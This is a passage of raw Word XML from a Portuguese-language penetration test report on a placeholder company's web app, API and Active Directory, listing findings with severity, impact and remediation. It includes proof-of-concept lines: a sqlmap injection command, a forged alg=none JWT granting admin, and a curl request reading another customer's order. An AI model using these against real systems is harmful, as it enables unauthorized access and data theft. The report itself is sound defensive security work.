          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto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E7B7D7D" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="D97706"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Médio</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto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289EE38" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="334155"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>6.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto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0848A9A" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="334155"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Aplicação Web</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00287A86" w14:paraId="35FADA6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E763E74" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="334155"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>F-06</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto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946D6D0" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="334155"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>SMB signing desabilitado (NTLM relay)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto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DABA7FA" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="D97706"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Médio</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto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D58076C" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="334155"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>5.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto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5219FC3" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="334155"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Rede</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00287A86" w14:paraId="34708FF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3995DBC" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="334155"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>F-08</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto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DADD79A" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="334155"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Cabeçalhos de segurança e configuração TLS fracos</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto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13514C5" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2563EB"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Baixo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto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C6AC400" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="334155"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>3.7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto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6EE0632" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="334155"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Configuração</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00287A86" w14:paraId="13FDC2E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D4FF4D5" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="334155"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>F-09</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto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F70841E" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="334155"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Divulgação de informação em mensagens de erro</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto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A894C96" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2563EB"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Baixo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto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04C0098" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="334155"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>3.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto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EBF827C" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="334155"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Aplicação Web</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00287A86" w14:paraId="7C929A0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92A5FA7" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="334155"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>F-10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto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9A42D56" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="334155"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Divulgação de versões de software (banners)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto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A6C0166" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="64748B"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Info</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto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C7E98FF" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="334155"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>0.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto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FC03A8A" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="334155"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Configuração</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1F2C9700" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Detalhamento dos achados</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA9B059" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="8" w:color="B91C1C"/>
        </w:pBdr>
        <w:spacing w:before="140" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">F-02 — SQL Injection (boolean/time-based) em /buscar  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>CRÍTICO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64DEF589" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="8" w:color="B91C1C"/>
        </w:pBdr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>CVSS 9.4 · CWE-89 · Aplicação Web · Afetado: loja.acme.example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587E733E" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="8" w:color="B91C1C"/>
        </w:pBdr>
        <w:spacing w:after="40"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="334155"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>O parâmetro "q" do endpoint de busca é concatenado diretamente na consulta SQL. A extração inferencial de dados foi confirmada (boolean e time-based), permitindo leitura arbitrária do banco.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0617EFA3" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="8" w:color="B91C1C"/>
        </w:pBdr>
        <w:spacing w:before="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="64748B"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>Confirmação de injeção (PoC de leitura, não destrutiva)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F50F915" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="0F172A"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>sqlmap -u "https://loja.acme.example/buscar?q=tenis" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407095A9" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="0F172A"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">  --batch --technique=BT --dbms=postgres --banner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2A57FA" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="0F172A"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t># parameter 'q' is injectable (boolean-based, time-based)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057DD4A9" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="8" w:color="B91C1C"/>
        </w:pBdr>
        <w:spacing w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="194FE3"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">Impacto: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="334155"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Exfiltração potencial de toda a base de dados (clientes, pedidos, hashes de senha).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47540BC5" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="8" w:color="B91C1C"/>
        </w:pBdr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="194FE3"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">Remediação: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="334155"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Usar consultas parametrizadas/prepared statements e ORM seguro; adicionar WAF como camada defensiva e princípio do menor privilégio no usuário de banco.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E545D21" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="8" w:color="B91C1C"/>
        </w:pBdr>
        <w:spacing w:before="140" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">F-01 — Bypass de autenticação via JWT com alg=none  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>CRÍTICO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0585AFA8" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="8" w:color="B91C1C"/>
        </w:pBdr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>CVSS 9.1 · CWE-347 · Aplicação Web · Afetado: api.acme.example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B06C76" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="8" w:color="B91C1C"/>
        </w:pBdr>
        <w:spacing w:after="40"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="334155"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>A API aceita tokens JWT com o cabeçalho {"alg":"none"}, ignorando a verificação de assinatura. Um atacante pode forjar tokens arbitrários, assumindo qualquer identidade e elevando privilégios para administrador.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3DE00E" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="8" w:color="B91C1C"/>
        </w:pBdr>
        <w:spacing w:before="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="64748B"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>Token forjado (sem assinatura) elevando para role=admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C95638" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="0F172A"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>header  = {"alg":"none","typ":"JWT"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DFD9A15" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="0F172A"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>payload = {"sub":"10231","role":"admin"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550CD525" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="0F172A"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t># aceito por api.acme.example -&gt; acesso a endpoints administrativos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6859CB26" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="8" w:color="B91C1C"/>
        </w:pBdr>
        <w:spacing w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="194FE3"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">Impacto: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="334155"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Acesso administrativo completo à API, incluindo dados de todos os clientes e operações privilegiadas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D3616C" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="8" w:color="B91C1C"/>
        </w:pBdr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="194FE3"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">Remediação: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="334155"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Fixar o algoritmo esperado (ex.: RS256) no verificador e rejeitar explicitamente "none"; rotacionar segredos e invalidar sessões emitidas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634D464C" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="8" w:color="EA580C"/>
        </w:pBdr>
        <w:spacing w:before="140" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">F-03 — IDOR/BOLA em /api/v1/orders/{id}  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="EA580C"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>ALTO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268EB830" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="8" w:color="EA580C"/>
        </w:pBdr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>CVSS 8.1 · CWE-639 · API · Afetado: api.acme.example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3CD677" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="8" w:color="EA580C"/>
        </w:pBdr>
        <w:spacing w:after="40"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="334155"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Um usuário autenticado lê pedidos de outros clientes apenas alterando o identificador, sem verificação de propriedade no servidor (Broken Object Level Authorization).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54FC6294" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="8" w:color="EA580C"/>
        </w:pBdr>
        <w:spacing w:before="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="64748B"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>Acesso ao pedido de outro cliente trocando o id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715EAF50" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="0F172A"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>curl -s https://api.acme.example/api/v1/orders/10232 \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58789150" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="0F172A"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">  -H "Authorization: Bearer $TOKEN_A" | jq '{id, customer, total, address}'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246B90A4" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="0F172A"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t># -&gt; retorna PII de cliente DISTINTO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D98B09B" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="8" w:color="EA580C"/>
        </w:pBdr>
        <w:spacing w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="194FE3"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">Impacto: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="334155"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Exposição de PII e histórico de compras de toda a base de clientes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75BBF9A8" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="8" w:color="EA580C"/>
        </w:pBdr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="194FE3"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">Remediação: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="334155"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Validar a propriedade do objeto no servidor (order.customer_id == session.user_id) e usar referências indiretas por usuário; incluir testes de autorização por objeto.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47658995" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="8" w:color="EA580C"/>
        </w:pBdr>
        <w:spacing w:before="140" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">F-04 — Kerberoasting de conta de serviço (svc_sql)  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="EA580C"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>ALTO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D5BF405" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="8" w:color="EA580C"/>
        </w:pBdr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>CVSS 8.0 · MITRE T1558.003 · Active Directory · Afetado: DC01 (10.20.10.5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BAD23F4" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="8" w:color="EA580C"/>
        </w:pBdr>
        <w:spacing w:after="40"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="334155"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>A conta de serviço svc_sql possui SPN e senha fraca, permitindo solicitar um ticket TGS e quebrar o hash offline, resultando em credenciais privilegiadas no domínio.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C49340F" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="8" w:color="EA580C"/>
        </w:pBdr>
        <w:spacing w:before="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
